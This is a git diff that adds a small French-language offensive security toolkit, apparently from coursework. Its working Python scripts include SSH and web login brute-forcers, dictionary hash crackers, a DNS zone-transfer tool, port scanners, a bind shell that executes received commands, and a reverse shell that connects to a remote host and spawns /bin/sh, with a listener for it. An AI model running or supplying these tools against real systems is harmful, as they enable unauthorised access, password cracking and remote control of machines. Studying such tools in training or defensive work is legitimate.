organisation

16 files changed, 459 insertions, 0 deletions

diff --git a/bruteforce/bruteSSH.py b/bruteforce/bruteSSH.py
new file mode 100644
index 0000000..32c93cb
--- /dev/null
+++ b/bruteforce/bruteSSH.py
@@ -0,0 +1,30 @@
+import paramiko, sys
+
+def bruteforce(hostname, username, password):
+    client = paramiko.SSHClient()
+    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+    try:
+        client.connect(hostname, username=username, password=password)
+    except paramiko.ssh_exception.AuthenticationException:
+        print("erreur : ",password)
+        #pass
+    else:
+        print("trouvé : ",password)
+        return True
+    finally:
+        client.close()
+
+if __name__ == "__main__":
+    hostname = sys.argv[1]
+    username = sys.argv[2]
+    dico = sys.argv[3]
+    try:
+        with open(dico, 'r') as wordlist:
+            for ligne in wordlist.readlines():
+                password=ligne.strip()
+                if bruteforce(hostname,username,password)==True:
+                    sys.exit()
+    except IndexError:
+        print(f"{sys.argv[0]} demande un hôte, un username et une liste de passwords en arguments")
+
+
diff --git a/bruteforce/bruteWeb.py b/bruteforce/bruteWeb.py
new file mode 100644
index 0000000..e75cde1
--- /dev/null
+++ b/bruteforce/bruteWeb.py
@@ -0,0 +1,37 @@
+import sys
+import requests 
+
+def bruteforce(method,url,username,password,error_msg):
+    if method == "post":
+        reponse=requests.post(url,data={
+        "username":username,
+        "password":password
+        })
+    elif method == "get":
+        reponse=requests.get(url,params={
+        "username":username,
+        "password":password
+        })
+
+    if error_msg in reponse.text:
+        #print("erreur : ",password)
+        pass
+    else:
+        print("trouvé : ",password)
+        return True
+
+if __name__ == "__main__":
+    method = sys.argv[1]
+    url = sys.argv[2]
+    username = sys.argv[3]
+    dico = sys.argv[4]
+    error_msg= sys.argv[5]
+    with open(dico, 'r') as wordlist:
+        for ligne in wordlist.readlines():
+            # le fichier nmap.lst à des commentaires en début de fichier
+            if ligne[0] != "#":
+                password=ligne.strip()
+                if bruteforce(method,url,username,password,error_msg)==True:
+                    sys.exit()
+
+
diff --git a/bruteforce/sshClient.py b/bruteforce/sshClient.py
new file mode 100644
index 0000000..41dabb4
--- /dev/null
+++ b/bruteforce/sshClient.py
@@ -0,0 +1,24 @@
+import sys, paramiko, getpass
+
+def sshClient(hostname,port,cmd,username,password):
+    client = paramiko.SSHClient()
+    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+    try:
+        client.connect(hostname,port=port,username=username, password=password)
+        _stdin, _stdout,_stderr = client.exec_command(cmd)
+        print(_stdout.read().decode())
+    except paramiko.ssh_exception.AuthenticationException:
+        print("Erreur d'authenfication !")
+    finally:
+        client.close()
+
+if __name__ == "__main__":
+    try:
+        hostname = sys.argv[1]
+        port = sys.argv[2]
+        cmd = sys.argv[3]
+        username = input("Nom d'utilisateur : ")
+        password = getpass.getpass()
+        sshClient(hostname,port,cmd,username,password)
+    except IndexError:
+        print(f"{sys.argv[0]} demande des arguments")
diff --git a/bruteforce/webClient.py b/bruteforce/webClient.py
new file mode 100644
index 0000000..4bd6ac2
--- /dev/null
+++ b/bruteforce/webClient.py
@@ -0,0 +1,16 @@
+#!/usr/bin/env python
+
+import requests
+
+def webClient(url,username,os):
+    response = requests.get(url,params={
+        "username": username,
+        "os": os
+        })
+    print(response.text)
+
+webClient("http://10.20.236.161:4444/page.php","jerome","Linux")
+
+
+
+
diff --git a/crypto/cesar.py b/crypto/cesar.py
new file mode 100644
index 0000000..cc58d8f
--- /dev/null
+++ b/crypto/cesar.py
@@ -0,0 +1,50 @@
+#!/usr/bin/env python
+
+import string
+
+
+def decalage(char, key):
+    liste = list(string.ascii_lowercase)*2 + list(string.ascii_uppercase)*2
+    #print(liste)
+    if char not in liste:
+        return char
+    else:
+        return liste[liste.index(char)+key]
+
+# print(decalage("a",3))
+
+
+print("********************")
+print("Chiffrement de César")
+print("********************")
+
+menu = ["c) Chiffrer un message", "d) Dechiffrer un message", "q) Quitter"]
+
+while True:
+    for choix in menu:
+        print(choix)
+    rep = input("Votre choix : ")
+    match rep.lower():
+        case "c":
+            msgChiffre = str()
+            msg = input("Votre message : ")
+            clef = int(input("Entrez votre clef (entre 1 et 25) : "))
+            for lettre in msg:
+                #msgChiffre = msgChiffre + decalage(lettre,clef)
+                msgChiffre += decalage(lettre, clef)
+            print("\nVotre message chiffré : ", msgChiffre, "\n")
+            print("********************")
+            msg = ""
+            msgChiffre = ""
+        case "d":
+            msg = str()
+            msgChiffre = input("Votre message : ")
+            for clef in range(25,0,-1):
+                for lettre in msgChiffre:
+                    msg += decalage(lettre, clef)
+                print(f"rot{26-clef} : {msg}")
+                msg = ""
+            print("********************")
+        case "q":
+            print("bye")
+            exit()
diff --git a/crypto/crack_hash.py b/crypto/crack_hash.py
new file mode 100644
index 0000000..b51cec7
--- /dev/null
+++ b/crypto/crack_hash.py
@@ -0,0 +1,33 @@
+#!/usr/bin/env python
+"""crack_hash module"""
+import sys
+import hashlib
+import argparse
+
+
+
+def crack_hash(hashlist, wordlist, hashsum):
+    """
+    Args:
+    hashlist la liste de hashes à trouver
+    wordlist: le dictionnaire
+    hashsum: la somme de controle : md5,sha256 ou sha512
+    """
+    with open(hashlist,"r") as fichier1:
+        hashes=fichier1.readlines()
+        for hash in hashes:
+             with open(wordlist, "r") as fichier2:
+                lignes = fichier2.readlines()
+                for ligne in lignes:
+                    if getattr(hashlib,hashsum)(ligne.strip().encode()).hexdigest() == hash.strip():
+                        print(f"trouvé: {ligne.strip()}")
+                        break
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument('hashlist', help='La liste de hash à trouver')
+    parser.add_argument('wordlist', help='Le dictionnaire choisi')
+    parser.add_argument('hashsum', help='la somme de contrôle : md5,sha256 ou sha512')
+    parser.parse_args()
+    crack_hash(sys.argv[1], sys.argv[2], sys.argv[3])
+
diff --git a/crypto/crack_md5.py b/crypto/crack_md5.py
new file mode 100644
index 0000000..00bac2b
--- /dev/null
+++ b/crypto/crack_md5.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+"""crack_md5 module"""
+import sys
+import hashlib
+
+def crack_md5(hash, wordlist):
+    """
+    Args:
+    hash : le hash à trouver
+    wordlist: le dictionnaire
+    """
+    with open(wordlist, "r") as fichier:
+        lignes = fichier.readlines()
+        for ligne in lignes:
+            if hashlib.md5(ligne.strip().encode()).hexdigest() == hash.strip():
+                print(f"trouvé: {ligne.strip()}")
+                break
+
+if __name__ == "__main__":
+    try:
+        crack_md5(sys.argv[1], sys.argv[2])
+    except IndexError:
+        print(f"{sys.argv[0]} demande des arguments. Voir l'aide.")
+
diff --git a/crypto/rot13.py b/crypto/rot13.py
new file mode 100644
index 0000000..b2730f1
--- /dev/null
+++ b/crypto/rot13.py
@@ -0,0 +1,16 @@
+#!/usr/bin/env python
+
+import string
+
+def rot13(char):
+    liste = list(string.ascii_lowercase)*2 + list(string.ascii_uppercase)*2
+    if char not in liste:
+        return char
+    else:
+        return liste[liste.index(char)+13]
+
+msg = input("Votre message : ")
+msgChiffre = str()
+for lettre in msg:
+    msgChiffre = msgChiffre + rot13(lettre)
+print(msgChiffre)
diff --git a/scan/dns_zone_xfer.py b/scan/dns_zone_xfer.py
new file mode 100644
index 0000000..9459cc2
--- /dev/null
+++ b/scan/dns_zone_xfer.py
@@ -0,0 +1,30 @@
+#!/bin/python3
+import dns.resolver
+import dns.zone
+
+def dns_zone_xfer(address):
+    ns_answer = dns.resolver.resolve(address, 'NS')
+    for server in ns_answer:
+        print("[*] Found NS: {}".format(server))
+        ip_answer = dns.resolver.resolve(server.target, 'A')
+        for ip in ip_answer:
+            print("[*] IP for {} is {}".format(server, ip))
+            try:
+                zone = dns.zone.from_xfr(dns.query.xfr(str(ip), address))   
+                hosts = zone.nodes.keys()                                   # a node is a set of rdatasets
+                for host in hosts:
+                    print(zone[host].to_text(host))                         # convert a node to text format
+            except dns.xfr.TransferError:
+                print("[*] NS {} refused zone transfer !".format(server))
+                continue
+            except dns.exception.FormError:
+                print("No answer or RRset for {}".format(address))
+                continue
+
+#dns_zone_xfer('megacorpone.com')
+if __name__ == "__main__":
+    import sys
+    try:
+        dns_zone_xfer(sys.argv[1])
+    except IndexError:
+        print(f"{sys.argv[0]} demande un nom de domaine en argument")
diff --git a/scan/nmapscanner.py b/scan/nmapscanner.py
new file mode 100644
index 0000000..5cd0659
--- /dev/null
+++ b/scan/nmapscanner.py
@@ -0,0 +1,34 @@
+import sys
+import nmap 
+    
+def nmscan(hosts,ports,arguments='-sV'):
+    nm = nmap.PortScanner() 
+    nm.scan(hosts,ports,arguments)
+
+
+    for host in nm.all_hosts():
+        print('----------------------------------------------------')
+        print('Host : %s (%s)' % (host, nm[host].hostname()))
+        print('State : %s' % nm[host].state())
+        for proto in nm[host].all_protocols():
+            print('----------') 
+            print('Protocol : %s' % proto)
+    
+            lport = nm[host][proto].keys()
+            #lport.sort()
+            for port in lport:
+                print("Port : {}\tState : {}\tService : {} ({} -  {})".format(port, nm[host][proto][port]['state'], nm[host][proto][port]['name'], nm[host][proto][port]['product'], nm[host][proto][port]['version']))
+    
+# nmscan("xlinfo.fr","22-443")
+# nmscan("xlinfo.fr","53","-sU -sV")  en sudo... 
+# nmscan("192.168.2.0/24","22")
+
+if __name__ == "__main__" :
+    try:
+        if len(sys.argv) > 3:
+            nmscan(sys.argv[1],sys.argv[2],sys.argv[3])
+        else:
+            nmscan(sys.argv[1],sys.argv[2])
+    except:
+        print(f"{sys.argv[0]} demande un ou plusieurs hôtes, une liste de ports, et des arguments optionnels")
+
diff --git a/scan/scan.py b/scan/scan.py
new file mode 100644
index 0000000..38150b2
--- /dev/null
+++ b/scan/scan.py
@@ -0,0 +1,25 @@
+import sys
+import socket
+
+def scan(host,*ports):
+    for port in ports:
+        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.settimeout(2)  # Set a 2-second timeout
+        addr_server=(host,int(port))
+        tentative=s.connect_ex(addr_server) #connect_ex renvoie 0 en cas de succès...
+        if tentative==0:
+            print(f"Le port {port} ouvert")
+            try:
+                print(s.recv(1024).decode().strip())
+            except TimeoutError:
+                pass
+        else:
+            print(f"Le port {port} fermé")
+        s.close()
+
+if __name__ == "__main__" :
+    try:
+        scan(sys.argv[1],*sys.argv[2:])
+    except:
+        print(f"{sys.argv[0]} demande un hôte et une liste de ports en arguments")
+
diff --git a/sockets/bindshell.py b/sockets/bindshell.py
new file mode 100644
index 0000000..5213002
--- /dev/null
+++ b/sockets/bindshell.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env python
+
+import sys, os, socket
+
+def bindshell(port):
+    try:
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.bind(('',port))
+        s.listen()
+        conn,addr = s.accept()
+        while 1:
+            data = conn.recv(1024)
+            reponse = os.popen(data.decode().strip()).read()
+            conn.sendall(str(reponse).encode())
+    except KeyboardInterrupt:
+        s.close()
+    finally:
+        print("bye")
+
+if __name__ == "__main__":
+    try:
+        bindshell(int(sys.argv[1]))
+    except IndexError:
+        print(f"{sys.argv[0]} demande un port en  agument")
+
+
+
+
+
+
+
diff --git a/sockets/chat_client.py b/sockets/chat_client.py
new file mode 100644
index 0000000..affc1d3
--- /dev/null
+++ b/sockets/chat_client.py
@@ -0,0 +1,26 @@
+#!/usr/bin/env python3
+
+import sys,socket,os
+
+def chat_client(host,port):
+    whoami = os.getenv("USER")
+    try:
+        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 
+        s.connect((host,port))
+        while True:
+            message = input("moi > ")
+            message = whoami+" > "+message # à commenter pour le bindshell
+            s.sendall(message.encode())
+            data = s.recv(1024)
+            print(data.decode().strip())
+    except KeyboardInterrupt:
+        s.close()
+    finally:
+        print("bye")
+
+if __name__ ==  "__main__":
+    try:
+        chat_client(sys.argv[1],int(sys.argv[2]))
+    except IndexError:
+        print(f"{sys.argv[0]} demande un hôte où se connecter et un numéro de port")
+
diff --git a/sockets/chat_server.py b/sockets/chat_server.py
new file mode 100644
index 0000000..aecf8c9
--- /dev/null
+++ b/sockets/chat_server.py
@@ -0,0 +1,29 @@
+#!/usr/bin/env python3
+
+import sys,socket,os
+
+def chat_server(port):
+    whoami = os.getenv("USER")
+    try:
+        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+        s.bind(('',port))
+        s.listen()
+        conn,addr = s.accept()
+        print(f"Connexion depuis {addr[0]} sur le port {addr[1]}")
+        while True:
+            data = conn.recv(1024)
+            print(data.decode())
+            reponse = input("moi > ")
+            reponse = whoami+" > "+reponse
+            conn.sendall(reponse.encode().strip())
+    except KeyboardInterrupt:
+        s.close()
+    finally:
+        print("bye")
+
+if __name__ == "__main__":
+    try:
+        chat_server(int(sys.argv[1]))
+    except IndexError:
+        print(f"{sys.argv[0]} demande un numéro de port en argument")
+
diff --git a/sockets/reverseshell.py b/sockets/reverseshell.py
new file mode 100644
index 0000000..fc7e860
--- /dev/null
+++ b/sockets/reverseshell.py
@@ -0,0 +1,18 @@
+#!/usr/bin/env python
+
+import sys, os, socket
+
+def reverseshell(host,port):
+    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+    s.connect((host,port))
+    os.dup2(s.fileno(),0)
+    os.dup2(s.fileno(),1)
+    os.dup2(s.fileno(),2)
+    os.system("/bin/sh -i")
+    
+if __name__ == "__main__":
+    try:
+        reverseshell(sys.argv[1],int(sys.argv[2]))
+    except IndexError:
+        print(f"{sys.argv[0]} demande un hôte et un port en  agument")
+
diff --git a/sockets/reverseshell_listener.py b/sockets/reverseshell_listener.py
new file mode 100644
index 0000000..23eb39a
--- /dev/null
+++ b/sockets/reverseshell_listener.py
@@ -0,0 +1,36 @@
+#!/usr/bin/env python
+
+import sys,socket,time
+
+def chat_server(port):
+    try:
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.bind(('',port))
+        s.listen()
+        conn,addr = s.accept()
+        print(f"Connexion depuis {addr[0]} sur le port {addr[1]}")
+        while True:
+            data = conn.recv(4096)
+            print(data.decode(),end="")
+            command = input()
+            command += "\n"
+            conn.send(command.encode())
+            time.sleep(0.1)
+    except KeyboardInterrupt:
+        s.close()
+    finally:
+        print("bye")
+
+if __name__ == "__main__":
+    try:
+        chat_server(int(sys.argv[1]))
+    except IndexError:
+        print(f"{sys.argv[0]} demande un port en  agument")
+
+
+
+
+
+
+
+